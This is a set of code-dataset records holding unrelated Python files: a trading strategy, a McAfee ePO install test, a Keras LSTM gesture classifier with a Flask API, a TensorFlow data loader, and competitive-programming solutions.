self.dataclose[self.p.delay])\n\n else:\n # Already in a position? check exit criteria\n\n # Long Eixt criteria\n e1 = (self.dataclose[0] < self.sl) # SL reached\n e2 = (self.dataclose[0] > self.reward) # Reward reached\n e3 = (self.dataopen[0] > self.reward) # Reward reached \n\n if (e1 | e2 | e3):\n # SELL, SELL, SELL!!! (with all possible default parameters)\n self.log('SELL CREATE... closed position, %.2f ' % self.dataclose[0])\n\n # Keep track of the created order to avoid a 2nd order\n self.order = self.sell(size=self.bsize)\n #printf(f) Close all positions EOD\n if self.position.size != 0:\n if self.data.datetime.time() > datetime.time(15,10):\n self.close(exectype=bt.Order.Market,size=self.position.size)\n","sub_path":"strategy2.py","file_name":"strategy2.py","file_ext":"py","file_size_in_byte":7320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"309843973","text":"#!/usr/bin/python\n\n# Copyright (C) 2010 McAfee, Inc. 
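# [editor's sketch] Worked numbers for the risk-based sizing in the entry branch
# above (all prices hypothetical). The stop sits just under the previous low,
# position size is capped so a stop-out costs about 1% of cash, and the target
# is rr (= 4) times the stop distance above the entry:
cash = 100_000.0
price = 250.0
stop = 248.0                                  # ~0.1% under the previous candle's low
risk_per_share = price - stop                 # 2.0
max_risk = cash * 0.01                        # 1000.0 -> at most 1% lost per trade
size = int(min(max_risk / risk_per_share,     # 500 shares by risk budget
               cash / price))                 # 400 shares by buying power -> 400
target = price + 4 * risk_per_share           # 258.0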
All rights reserved.\n# TestcaseID: ID001\n# TestcaseDescription: Sample description\nimport socket\nimport sys\nimport logging\nimport os\nimport time\nimport subprocess\n# Add common folder into the sys path for module importing\n_script_path = os.path.abspath(os.path.dirname(sys.argv[0]))\n_common_path = _script_path + '/../Common'\nsys.path.append(_common_path)\nsys.path.append(_script_path)\nimport commonFns\nimport ePOCommonFns\n\n# Import ePolicyOrchestrator class in current namespace\nfrom ePOCommonFns import ePolicyOrchestrator\n# Import CommonTest module into current namespace\nfrom CommonTest import *\n\n# Get testcase name\ntestcaseName = os.path.basename(sys.argv[0][:-3])\n\nclass TestCase(BaseTest):\n    def __init__(self):\n        logging.info("TestcaseID : ID001")\n        logging.info("Description : Sample description")\n\n    def init(self):\n        logging.info("Initializing testcase %s" % testcaseName)\n\n        # Using the existing api.\n        logging.debug('Reading the ePO details from config file')\n        self._config_file = _common_path + '/mountConfig.xml'\n        if not os.path.exists(self._config_file) :\n            logging.error("Config file is missing. Could not continue.")\n            return 1\n\n        self._config = commonFns.getMountVolumeDetails(self._config_file, 'epo')\n\n        logging.debug("Creating ePolicyOrchestrator object")\n        self.epo = ePolicyOrchestrator(self._config['ip'], self._config['username'], self._config['password'])\n\n        if commonFns.isProductInstalled() :\n            logging.debug("Product already installed, removing it")\n            subprocess.call( [ "/usr/local/McAfee/uninstallMSC" ],stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n        else:\n            logging.info("No previous installation")\n\n        self.prod_name = 'MSMAVAS_1000'\n        self.version = '1.0676'\n        self.host = socket.gethostname().rstrip('.local')\n\n        logging.debug("Checking if the package is already checked in the epo")\n        if not self.epo.isProductCheckedIn(self.prod_name) :\n            logging.error("Product is not checked in to ePO. 
Could not continue\")\n return 1\n \n return 0\n\n def execute(self):\n logging.info(\"Executing testcase %s\" % testcaseName)\n\n logging.info('Checking if MA is installed or not')\n if not commonFns.isMcAfeeAgentInstalled() :\n self._ma_install_path = self.epo.getAgentInstaller()\n if not os.path.exists(self._ma_install_path) :\n logging.error(\"The install.sh file does not exist and hence could not install McAfee Agent\")\n return 1\n if not commonFns.installMcAfeeAgent(self._ma_install_path) :\n logging.error(\"Failed to install McAfee Agent\")\n return 1\n logging.info(\"Successfully installed McAfee Agent, now will continue with product installation\")\n while (not self.epo.systemExists(self.host)) :\n logging.debug(\"Waiting for machine to be listed in the epo\")\n time.sleep(60)\n\n # This will create the task, and also send the wakeup agent.\n logging.debug(\"Installing product %s version %s\" %(self.prod_name, self.version))\n self.epo.installProduct(self.host, self.prod_name, self.version, 'MAC')\n\n # Lets wait for 300 seconds for product to get installed.\n for t in range(0, 300, 5) :\n time.sleep(5)\n if commonFns.isProductInstalled() :\n logging.debug('Product got installed')\n break\n else :\n logging.error(\"Product still not installed after 300 seconds\")\n return 1\n return 0\n\n def verify(self):\n logging.info(\"Verifying testcase %s\" % testcaseName)\n\n logging.debug('Checking if product is installed')\n if not commonFns.isProductInstalled() :\n logging.error('Product is not installed.')\n return 1\n logging.debug('Product is installed successfully')\n return 0\n\n def cleanup(self):\n logging.info(\"Performing cleanup for testcase %s\" % testcaseName)\n # Copy logs and clean them.\n foundCrash = 0\n foundCrash = commonFns.copyLogs()\n commonFns.cleanLogs()\n\n if foundCrash != 0:\n logging.error(\"copylogs returned failure status. Maybe a product crash\")\n\n return foundCrash\n\n def __del__(self):\n pass\n\nif __name__ == \"__main__\":\n # Setup testcase\n setupTestcase(sys.argv)\n\n testObj = TestCase()\n\n # Perform testcase operations\n retVal = testObj.init()\n\n # Perform execute once initialization succeeds... 
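# [editor's note] The 300-second install wait above relies on Python's
# for ... else: the else block runs only when the loop finishes without
# hitting break. A minimal restatement of that polling pattern:
import time

def wait_until(condition, attempts=60, delay=5):
    for _ in range(attempts):
        if condition():
            break                 # success skips the else block entirely
        time.sleep(delay)
    else:
        raise TimeoutError("condition not met after %d s" % (attempts * delay))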
\n if(retVal == 0):\n retVal = testObj.execute()\n\n # Once execution succeeds, perform verification...\n if(retVal == 0):\n retVal = testObj.verify()\n\n # Perform testcase cleanup\n retVal = retVal + testObj.cleanup()\n\n if(retVal == 0):\n resultString = \"PASS\"\n else:\n resultString = \"FAIL\"\n \n logging.info(\"Result of testcase %s: %s\" % (testcaseName, resultString) )\n sys.exit(retVal)\n\n\n","sub_path":"McAfee/src/TestAutomation/Testcases/FVT/EPO/EPO_Install_Product.py","file_name":"EPO_Install_Product.py","file_ext":"py","file_size_in_byte":5150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"413784161","text":"from keras.models import Sequential\nfrom keras.layers import LSTM\nfrom keras.layers import Dense, Dropout\nfrom numpy import genfromtxt\nfrom flask import Flask, request\nfrom flask_restful import Resource, Api, reqparse\nimport numpy\nimport codecs\nimport csv\nfrom sklearn.metrics import confusion_matrix,roc_auc_score,roc_curve,auc,accuracy_score\nfrom sklearn.metrics import precision_score,recall_score,classification_report\nimport matplotlib.pyplot as plt\nfrom keras.utils import np_utils\nimport numpy as np\nimport socket\nimport pandas as pd\nimport ast\nimport json\n\nimport os\nimport io\nimport requests\n\n\n# classification instance\ndef get_sequence(steps,time):\n x = [data[index] for index in range((time*10)+1 ,(time*10)+10+1)]\n x = numpy.delete(x, (data.shape[1]-1), axis=1)\n x= numpy.array(x)\n y = [Y[index] for index in range((time*10) ,(time*10)+10)]\n y=numpy.array(y)\n X = x.reshape(1, steps, (data.shape[1]-1))\n y = y.reshape(1, steps, y.shape[1])\n return X, y\n\ndef singleSequence():\n x = [single[1]]\n x = numpy.delete(x, (single.shape[1] - 1), axis=1)\n x = numpy.array(x)\n\n\ndata = genfromtxt('data.csv', delimiter=',')\nm =[data[i][-1] for i in range(1,7671)]\nY = np_utils.to_categorical(m)\n\n\n\nsteps = 10\n#LSTM\nmodel = Sequential()\nmodel.add(LSTM(30,input_shape = (None, (data.shape[1]-1)),return_sequences=True))\nmodel.add(Dropout(0.25))\nmodel.add(Dense(6, activation='softmax'))\n\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc'])\n\nprint(model.summary())\n\n\n# train LSTM\nfor epoch in range(0,50):\n\tX,y = get_sequence(steps,epoch)\n\tmodel.fit(X, y,batch_size=1, verbose=0)\n\n\ncountp=0\ncountn=0\n\nypredicted = []\nyactual = []\n\nfor d in range(534,575):\n X,y = get_sequence(steps,d)\n #yactual[] = [y[i] for i in range(len(y))]\n yhat = model.predict(X,verbose=0)[0]\n for index1 in range(10):\n i = np.where(yhat[index1] == yhat[index1].max())\n hin = i[0]\n for index2 in range(6):\n if(index2==hin):\n yhat[index1][index2]=1\n else:\n yhat[index1][index2]=0\n j= yhat\n k= y[0]\n for index1 in range(10):\n ypredicted.append(j[index1])\n yactual.append(k[index1])\n\nya = []\nyp = []\nfor index1 in range(len(ypredicted)):\n if (ypredicted[index1][0]==1 and ypredicted[index1][1]==0 and ypredicted[index1][2]==0 and ypredicted[index1][3]==0 and ypredicted[index1][4]==0 and ypredicted[index1][5]==0):\n yp.append(0)\n if (ypredicted[index1][0]==0 and ypredicted[index1][1]==1 and ypredicted[index1][2]==0 and ypredicted[index1][3]==0 and ypredicted[index1][4]==0 and ypredicted[index1][5]==0):\n yp.append(1)\n if (ypredicted[index1][0]==0 and ypredicted[index1][1]==0 and ypredicted[index1][2]==1 and ypredicted[index1][3]==0 and ypredicted[index1][4]==0 and ypredicted[index1][5]==0):\n yp.append(2)\n if (ypredicted[index1][0]==0 and 
ypredicted[index1][1]==0 and ypredicted[index1][2]==0 and ypredicted[index1][3]==1 and ypredicted[index1][4]==0 and ypredicted[index1][5]==0):\n yp.append(3)\n if (ypredicted[index1][0]==0 and ypredicted[index1][1]==0 and ypredicted[index1][2]==0 and ypredicted[index1][3]==0 and ypredicted[index1][4]==1 and ypredicted[index1][5]==0):\n yp.append(4)\n if (ypredicted[index1][0]==0 and ypredicted[index1][1]==0 and ypredicted[index1][2]==0 and ypredicted[index1][3]==0 and ypredicted[index1][4]==0 and ypredicted[index1][5]==1):\n yp.append(5)\n \nfor index1 in range(len(yactual)):\n if (yactual[index1][0]==1 and yactual[index1][1]==0 and yactual[index1][2]==0 and yactual[index1][3]==0 and yactual[index1][4]==0 and yactual[index1][5]==0):\n ya.append(0)\n if (yactual[index1][0]==0 and yactual[index1][1]==1 and yactual[index1][2]==0 and yactual[index1][3]==0 and yactual[index1][4]==0 and yactual[index1][5]==0):\n ya.append(1)\n if (yactual[index1][0]==0 and yactual[index1][1]==0 and yactual[index1][2]==1 and yactual[index1][3]==0 and yactual[index1][4]==0 and yactual[index1][5]==0):\n ya.append(2)\n if (yactual[index1][0]==0 and yactual[index1][1]==0 and yactual[index1][2]==0 and yactual[index1][3]==1 and yactual[index1][4]==0 and yactual[index1][5]==0):\n ya.append(3)\n if (yactual[index1][0]==0 and yactual[index1][1]==0 and yactual[index1][2]==0 and yactual[index1][3]==0 and yactual[index1][4]==1 and yactual[index1][5]==0):\n ya.append(4) \n if (yactual[index1][0]==0 and yactual[index1][1]==0 and yactual[index1][2]==0 and yactual[index1][3]==0 and yactual[index1][4]==0 and yactual[index1][5]==1):\n ya.append(5)\nprint(len(ya))\nprint(len(yp))\n\n\nfor i in range(len(ya)):\n if(ya[i] == yp[i]):\n countp = countp+1\n else:\n if(i!=len(ya)-1):\n if((ya[i+1]!=0 and yp[i]!=0) or (ya[i-1]!=0 and yp[i]!=0)):\n countp=countp+1\n else:\n countn = countn+1\n else:\n countn = countn+1\n\n\nyaa=[]\nypp=[]\nfor i in range(len(ya)-1):\n if(ya[i]==yp[i]):\n yaa.append(ya[i])\n ypp.append(yp[i])\n else:\n if(ya[i]!=yp[i]):\n if((ya[i]==2 and yp[i+1]==2) or (ya[i-1]==2 and yp[i]==2) or (ya[i]==2 and yp[i-1]==2) or (ya[i+1]==2 and yp[i]==2)):\n yaa.append(2)\n ypp.append(2)\n elif((ya[i]==3 and yp[i+1]==3) or (ya[i-1]==3 and yp[i]==3) or (ya[i]==3 and yp[i-1]==3) or (ya[i+1]==3 and yp[i]==3)):\n yaa.append(3)\n ypp.append(3)\n elif((ya[i]==4 and yp[i+1]==4) or (ya[i-1]==4 and yp[i]==4) or (ya[i]==4 and yp[i-1]==4) or (ya[i+1]==4 and yp[i]==4)):\n yaa.append(4)\n ypp.append(4)\n elif((ya[i]==5 and yp[i+1]==5) or (ya[i-1]==5 and yp[i]==5) or (ya[i]==5 and yp[i-1]==5) or (ya[i+1]==5 and yp[i]==5)):\n yaa.append(5)\n ypp.append(5)\n else:\n yaa.append(ya[i])\n ypp.append(yp[i])\n\n\n\nconf_arr = confusion_matrix(yaa, ypp)\nconf_ar_1 = confusion_matrix(ya, yp)\n\n\nprint(classification_report(yaa, ypp))\nprint(classification_report(ya, yp))\nprint(accuracy_score(yaa,ypp))\nprint(accuracy_score(ya,yp))\n\n\ntest_data = [65.71663828,2.000559697,0.927509588,1.367263894,28.9932391,-1.43680042,3.233846317,1.390503227,-0.003797961,-0.009765845,-0.001452424,-0.006051978,-0.006581628,-0.008367425,-0.007925678,-0.000485979,0.991099664,0.993213923,0.99992176,0.99450799,0.992888764,0.995900923,0.994969843,0.997058683,0.652125548,0.201729356,0.237883894,0.455559514,0.652909188,0.201363975,0.24440563,0.459197528,0.646552844,0.003788574,0.114773499,0.420182046]\ntest_data2 = np.array(test_data)\ntest_data3 = test_data2.reshape(1, 1, 36)\n\nresultnewTest = model.predict(test_data3, verbose=0)[0]\n\nprint(resultnewTest)\n\n\nfor 
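# [editor's note] The long if-chains above map one-hot rows back to class ids
# 0..5 and snap probability rows to hard one-hot vectors. numpy collapses both
# to a line each; a small self-contained check:
import numpy as np

one_hot = np.array([[0, 0, 1, 0, 0, 0],
                    [1, 0, 0, 0, 0, 0]])
assert (one_hot.argmax(axis=1) == np.array([2, 0])).all()   # row -> class id

probs = np.array([[0.1, 0.7, 0.05, 0.05, 0.05, 0.05]])
hard = np.eye(6)[probs.argmax(axis=1)]        # one-hot of the max class per row
assert (hard == np.array([[0., 1., 0., 0., 0., 0.]])).all()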
index1 in range(1):\n i = np.where(resultnewTest[index1] == resultnewTest[index1].max())\n hin = i[0]\n for index2 in range(6):\n if(index2==hin):\n resultnewTest[index1][index2]=1\n else:\n resultnewTest[index1][index2]=0\n\n\nprint(resultnewTest)\ntest_data = [3.496975571,5.23133881,2.969923024,1.403945156,2.586841992,3.263263203,3.875656459,1.427367267,-0.00310496,-0.008150457,-0.004602477,-0.008577343,-0.001675536,-0.005400046,-0.005581164,-0.003245549,0.993325865,0.991415445,0.996473748,0.998845225,0.996452155,0.995826012,0.994582555,0.995877992,0.679476704,0.227064595,0.321708889,0.436399674,0.683794901,0.228052776,0.326327732,0.439317916,0.697691169,0.190961651,0.31343034,0.423416975]\ntest_data2 = np.array(test_data)\ntest_data3 = test_data2.reshape(1, 1, 36)\n\nresultnewTest = model.predict(test_data3, verbose=0)[0]\n\nprint(resultnewTest)\n\n\nfor index1 in range(1):\n i = np.where(resultnewTest[index1] == resultnewTest[index1].max())\n hin = i[0]\n for index2 in range(6):\n if(index2==hin):\n resultnewTest[index1][index2]=1\n else:\n resultnewTest[index1][index2]=0\n\n\nprint(resultnewTest)\n\napp = Flask(__name__)\napi = Api(app)\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n request_data = request.get_json()\n\n test_data = [request_data['kurtosisx'],request_data['kurtosisy'],request_data['kurtosisz'],request_data['kurtosisf'],request_data['abs_kurtosisx'],request_data['abs_kurtosisy'],request_data['abs_kurtosisz'],request_data['abs_kurtosisf'],request_data['minx'],request_data['miny'],request_data['minz'],request_data['minf'],request_data['abs_minx'],request_data['abs_miny'],request_data['abs_minz'],request_data['abs_minf'],request_data['maxx'],request_data['maxy'],request_data['maxz'],request_data['maxf'],request_data['abs_maxx'],request_data['abs_maxy'],request_data['abs_maxz'],request_data['abs_maxf'],request_data['meanx'],request_data['meany'],request_data['meanz'],request_data['meanf'],request_data['abs_meanx'],request_data['abs_meany'],request_data['abs_meanz'],request_data['abs_meanf'],request_data['medianx'],request_data['mediany'],request_data['medianz'],request_data['medianf']]\n\n #test_data = [3.496975571,5.23133881,2.969923024,1.403945156,2.586841992,3.263263203,3.875656459,1.427367267,-0.00310496,-0.008150457,-0.004602477,-0.008577343,-0.001675536,-0.005400046,-0.005581164,-0.003245549,0.993325865,0.991415445,0.996473748,0.998845225,0.996452155,0.995826012,0.994582555,0.995877992,0.679476704,0.227064595,0.321708889,0.436399674,0.683794901,0.228052776,0.326327732,0.439317916,0.697691169,0.190961651,0.31343034,0.423416975]\n test_data2 = np.array(test_data)\n test_data3 = test_data2.reshape(1, 1, 36)\n resultnewTest = model.predict(test_data3, verbose=0)[0]\n for index1 in range(1):\n i = np.where(resultnewTest[index1] == resultnewTest[index1].max())\n hin = i[0]\n for index2 in range(6):\n if(index2==hin):\n resultnewTest[index1][index2]=1\n else:\n resultnewTest[index1][index2]=0\n return {\"t1\": str(resultnewTest[0][0]), \"t2\": str(resultnewTest[0][1]), \"t3\": str(resultnewTest[0][2]), \"t4\": str(resultnewTest[0][3]), \"t5\": str(resultnewTest[0][4]), \"t6\": str(resultnewTest[0][5])}, 200\n\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"LSTM_API.py","file_name":"LSTM_API.py","file_ext":"py","file_size_in_byte":10432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"614211876","text":"#!/usr/bin/python3\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\nfrom 
config import directories\n\nclass Data(object):\n\n @staticmethod\n def load_dataframe(filename, load_semantic_maps=False):\n df = pd.read_hdf(filename, key='df').sample(frac=1).reset_index(drop=True).sort_values(by='path',ascending=False)\n\n if load_semantic_maps:\n return df['path'].values, df['semantic_map_path'].values\n else:\n return df['path'].values\n\n @staticmethod\n def load_dataset(image_paths, batch_size, test=False, augment=False, downsample=False,\n training_dataset='cityscapes', use_conditional_GAN=False, **kwargs):\n\n def _augment(image):\n # On-the-fly data augmentation\n image = tf.image.random_brightness(image, max_delta=0.1)\n image = tf.image.random_contrast(image, 0.5, 1.5)\n image = tf.image.random_flip_left_right(image)\n\n return image\n\n def _parser(image_path, semantic_map_path=None):\n\n def _aspect_preserving_width_resize(image, width=512):\n height_i = tf.shape(image)[0]\n # width_i = tf.shape(image)[1]\n # ratio = tf.to_float(width_i) / tf.to_float(height_i)\n # new_height = tf.to_int32(tf.to_float(height_i) / ratio)\n new_height = height_i - tf.floormod(height_i, 16)\n return tf.image.resize_image_with_crop_or_pad(image, new_height, width)\n\n def _image_decoder(path):\n im = tf.image.decode_png(tf.read_file(path), channels=3)\n im = tf.image.convert_image_dtype(im, dtype=tf.float32)\n return 2 * im - 1 # [0,1] -> [-1,1] (tanh range)\n \n image = _image_decoder(image_path)\n\n # Explicitly set the shape if you want a sanity check\n # or if you are using your own custom dataset, otherwise\n # the model is shape-agnostic as it is fully convolutional\n\n # im.set_shape([512,1024,3]) # downscaled cityscapes\n\n if use_conditional_GAN:\n # Semantic map only enabled for cityscapes\n semantic_map = _image_decoder(semantic_map_path) \n\n if training_dataset == 'ADE20k':\n image = _aspect_preserving_width_resize(image)\n if use_conditional_GAN:\n semantic_map = _aspect_preserving_width_resize(semantic_map)\n # im.set_shape([None,512,3])\n\n if use_conditional_GAN:\n return image, semantic_map\n else:\n return image\n \n\n print('Training on', training_dataset)\n\n if use_conditional_GAN:\n dataset = tf.data.Dataset.from_tensor_slices((image_paths, kwargs['semantic_map_paths']))\n else:\n dataset = tf.data.Dataset.from_tensor_slices(image_paths)\n if test is False:\n dataset = dataset.shuffle(buffer_size=8)\n dataset = dataset.map(_parser)\n dataset = dataset.cache()\n #dataset = dataset.batch(batch_size,drop_remainder=tf.constant(True,dtype=tf.bool))\n dataset = dataset.apply(tf.contrib.data.batch_and_drop_remainder(batch_size))\n\n #if test:\n # dataset = dataset.repeat()\n\n return dataset\n\n @staticmethod\n def load_cGAN_dataset(image_paths, semantic_map_paths, batch_size, test=False, augment=False, downsample=False,\n training_dataset='cityscapes'):\n \"\"\"\n Load image dataset with semantic label maps for conditional GAN\n \"\"\" \n\n def _parser(image_path, semantic_map_path):\n def _aspect_preserving_width_resize(image, width=512):\n # If training on ADE20k\n height_i = tf.shape(image)[0]\n new_height = height_i - tf.floormod(height_i, 16)\n \n return tf.image.resize_image_with_crop_or_pad(image, new_height, width)\n\n def _image_decoder(path):\n im = tf.image.decode_png(tf.read_file(image_path), channels=3)\n im = tf.image.convert_image_dtype(im, dtype=tf.float32)\n return 2 * im - 1 # [0,1] -> [-1,1] (tanh range)\n\n\n image, semantic_map = _image_decoder(image_path), _image_decoder(semantic_map_path)\n \n print('Training on', training_dataset)\n if 
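# [editor's note] Two small numeric checks for the decoder above: _image_decoder
# maps [0, 1] pixels into the tanh range via 2*im - 1, and the width-preserving
# resize trims the height down to a multiple of 16 with tf.floormod. In plain
# Python:
for pixel, expected in [(0.0, -1.0), (0.5, 0.0), (1.0, 1.0)]:
    assert 2 * pixel - 1 == expected

height = 333
new_height = height - height % 16   # 333 - 13 = 320, same as height_i - floormod(height_i, 16)
assert new_height == 320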
training_dataset is 'ADE20k':\n image = _aspect_preserving_width_resize(image)\n semantic_map = _aspect_preserving_width_resize(semantic_map)\n\n # im.set_shape([512,1024,3]) # downscaled cityscapes\n\n return image, semantic_map\n\n dataset = tf.data.Dataset.from_tensor_slices(image_paths, semantic_map_paths)\n dataset = dataset.map(_parser)\n dataset = dataset.shuffle(buffer_size=8)\n dataset = dataset.batch(batch_size)\n\n if test:\n dataset = dataset.repeat()\n\n return dataset\n\n @staticmethod\n def load_inference(filenames, labels, batch_size, resize=(32,32)):\n\n # Single image estimation over multiple stochastic forward passes\n\n def _preprocess_inference(image_path, label, resize=(32,32)):\n # Preprocess individual images during inference\n image_path = tf.squeeze(image_path)\n image = tf.image.decode_png(tf.read_file(image_path))\n image = tf.image.convert_image_dtype(image, dtype=tf.float32)\n image = tf.image.per_image_standardization(image)\n image = tf.image.resize_images(image, size=resize)\n\n return image, label\n\n dataset = tf.data.Dataset.from_tensor_slices((filenames, labels))\n dataset = dataset.map(_preprocess_inference)\n dataset = dataset.batch(batch_size)\n \n return dataset\n\n","sub_path":"ade_train_script/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"100397707","text":"#string='29 / 5 ='\n#print(string.split())\n\nfor test in range(2*int(input())):\n\ts=input()\n\ts=s.split()\n\tif(len(s)!=0):\n\t\tans=int(s[0])\n\t\tfor i in range(1,len(s)):\n\t\t\t#print(s[i])\n\t\t\tif s[i]=='+':\n\t\t\t\tans=ans+int(s[i+1])\n\t\t\t\ti+=1\n\t\t\telif s[i]=='-':\n\t\t\t\tans=ans-int(s[i+1])\n\t\t\t\ts[i]+=1\n\t\t\telif s[i]=='*':\n\t\t\t\tans=ans*int(s[i+1])\n\t\t\t\ti+=1\n\t\t\telif s[i]=='/':\n\t\t\t\tans=ans//int(s[i+1])\n\t\t\t\ti+=1\n\t\t\telif s[i]=='=':\n\t\t\t\tbreak\n\t\t\t#print(ans)\n\t\tprint(ans)","sub_path":"Spoj/spojARITH2.py","file_name":"spojARITH2.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"401688065","text":"#\n# @lc app=leetcode.cn id=127 lang=python3\n#\n# [127] 单词接龙\n#\n\n# @lc code=start\nimport string\nclass Solution:\n def ladderLength(self, beginWord: str, endWord: str, wordList) -> int:\n if endWord not in wordList:\n return 0\n front={beginWord}\n back={endWord}\n dist=1\n wordList=set(wordList)\n word_len=len(beginWord)\n while front:\n dist+=1\n next_front=set()\n for word in front:\n for i in range(word_len):\n for c in string.ascii_lowercase:\n if c!=word[i]:\n new_word=word[:i]+c+word[i+1:]\n if new_word in back:\n return dist\n if new_word in wordList:\n next_front.add(new_word)\n wordList.remove(new_word)\n front=next_front\n if len(back) int:\n# if endWord not in wordList or not endWord or not beginWord or not wordList:\n# return 0\n\n# L=len(beginWord)\n\n# all_combo_dict=defaultdict(list)\n# for word in wordList:\n# for i in range(L):\n# all_combo_dict[word[:i]+'*'+word[i+1:]].append(word)\n\n# queue=[(beginWord,1)]\n# visted={beginWord:True}\n# while queue:\n# current_word,level=queue.pop(0)\n# for i in range(L):\n# intermediate_word=current_word[:i]+'*'+current_word[i+1:]\n\n# for word in all_combo_dict[intermediate_word]:\n# if word==endWord:\n# return level+1\n# if word not in visted:\n# queue.append((word,level+1))\n# all_combo_dict[intermediate_word]=[]\n# return 0\n\n# def ladderLength(self, 
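# [editor's note] tf.contrib was removed in TensorFlow 2.x; on TF >= 1.10 the
# batch_and_drop_remainder(...) call above is equivalent to the drop_remainder
# flag, which takes a plain Python bool (no tf.constant needed):
#
#     dataset = dataset.batch(batch_size, drop_remainder=True)
#
# This is an upgrade note, not part of the original module.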
beginWord: str, endWord: str, wordList) -> int:\n# if endWord not in endWord:\n# return 0\n# length=len(beginWord)\n# dif=0\n# queue=deque()\n# queue.append(beginWord)\n# queue.append(',')\n# lay=2\n# while queue:\n# curr=queue.popleft()\n# if curr==',':\n# lay+=1\n# queue.append(',')\n# continue\n# for word in wordList:\n# for j in range(length):\n# if curr[j]!=word[j]:\n# dif+=1\n# if dif>=2:\n# dif=0\n# break\n# if dif==1:\n# if word==endWord:\n# return lay\n# queue.append(word)\n# dif=0\n# wordList.remove(word)\n# return 0\n\n# def ladderLength(self, beginWord: str, endWord: str, wordList) -> int:\n# if endWord not in endWord:\n# return 0\n# length=len(beginWord)\n# selected=[False]*len(wordList)\n# dif=0\n# queue=deque()\n# queue.append(beginWord)\n# queue.append(',')\n# lay=2\n# while queue:\n# curr=queue.popleft()\n# if curr==',':\n# lay+=1\n# queue.append(',')\n# continue\n# for i in range(len(wordList)):\n# if selected[i]:\n# continue\n# word=wordList[i]\n# for j in range(length):\n# if curr[j]!=word[j]:\n# dif+=1\n# if dif>=2:\n# dif=0\n# break\n# if dif==1:\n# if word==endWord:\n# return lay\n# selected[i]=True\n# queue.append(word)\n# dif=0\n# return 0","sub_path":"Week_07/G20200389010076/LeetCode_127_0076.py","file_name":"LeetCode_127_0076.py","file_ext":"py","file_size_in_byte":4245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"511190103","text":"# Copyright 2018 Ryohei Kamiya \r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n\r\n\r\nfrom logzero import logger\r\nimport sys\r\nimport argparse\r\nimport os\r\nimport os.path\r\nimport tkinter\r\nimport datetime\r\nimport pointsbuffer\r\nfrom PIL import Image, ImageDraw\r\n\r\nimport numpy as np\r\nfrom numpy.random import seed\r\n\r\nfrom tfkeras_mlp import MLP\r\nfrom tfkeras_lenet import LeNet\r\nfrom tfkeras_lstm_with_baseshift import LSTM\r\n\r\ndef get_args(mlp_model_params_path=\"mlp-parameters.h5\", lenet_model_params_path=\"lenet-parameters.h5\",\r\n lstm_model_params_path=\"lstm-parameters.h5\", labels_path=\"labels.txt\",\r\n x_length=64, x_input_length=16, x_split_step=1, width=28, height=28,\r\n lstm_units=32, description=None):\r\n if description is None:\r\n description = \"Gesture recognizer\"\r\n parser = argparse.ArgumentParser(description)\r\n parser.add_argument(\"--net\", \"-n\", type=str,\r\n default='mlp',\r\n help=\"Neural network architecure type : ('mlp'|'lenet'|'mlp-with-lstm')\")\r\n parser.add_argument(\"--mlp-model-params-path\", \"-mlp\",\r\n type=str, default=mlp_model_params_path,\r\n help='Path of the mlp model parameters file.')\r\n parser.add_argument(\"--lenet-model-params-path\", \"-lenet\",\r\n type=str, default=lenet_model_params_path,\r\n help='Path of the lenet model parameters file.')\r\n parser.add_argument(\"--lstm-model-params-path\", \"-lstm\",\r\n type=str, default=lstm_model_params_path,\r\n help='Path of the lstm model parameters file.')\r\n parser.add_argument(\"--labels-path\", \"-l\",\r\n 
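# [editor's note] Quick sanity check of the bidirectional-BFS ladderLength above,
# using the classic example (hit -> hot -> dot -> dog -> cog is 5 words):
assert Solution().ladderLength(
    "hit", "cog", ["hot", "dot", "dog", "lot", "log", "cog"]) == 5
assert Solution().ladderLength("hit", "xyz", ["hot"]) == 0   # endWord absent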
type=str, default=labels_path,\r\n help='Path of the labels file.')\r\n parser.add_argument(\"--x-length\", \"-xl\", type=int, default=x_length,\r\n help='Length of time-series into the mlp network.')\r\n parser.add_argument(\"--x-input-length\", \"-xil\", type=int, default=x_input_length,\r\n help='Length of time-series into the lstm network.')\r\n parser.add_argument(\"--x-split-step\", \"-xss\", type=int, default=x_split_step,\r\n help='Step size to split time-series.')\r\n parser.add_argument(\"--width\", \"-wt\", type=int, default=width,\r\n help='Image width.')\r\n parser.add_argument(\"--height\", \"-ht\", type=int, default=height,\r\n help='Image height.')\r\n parser.add_argument(\"--lstm-units\", \"-lstmu\", type=int, default=lstm_units,\r\n help='The number of LSTM units.')\r\n args = parser.parse_args()\r\n return args\r\n\r\nclass GestureRecognizer:\r\n def __init__(self, args):\r\n class Config:\r\n pass\r\n self._config = Config()\r\n self._config.process = 'infer'\r\n self._config.columns_size = 2\r\n self._config.x_length = args.x_length\r\n self._config.x_input_length = args.x_input_length\r\n self._config.x_split_step = args.x_split_step\r\n self._config.width = args.width\r\n self._config.height = args.height\r\n self._config.lstm_units = args.lstm_units\r\n self._config.batch_size = 1\r\n self._config.epochs = 0\r\n self._config.validation_split = 0.0\r\n self._config.learning_rate = 0.0\r\n self._config.training_dataset_path = None\r\n self._config.evaluation_dataset_path = None\r\n\r\n self._net_type = args.net\r\n logger.info(\"Network type is {}.\".format(self._net_type))\r\n self._mlp = None\r\n self._lenet = None\r\n 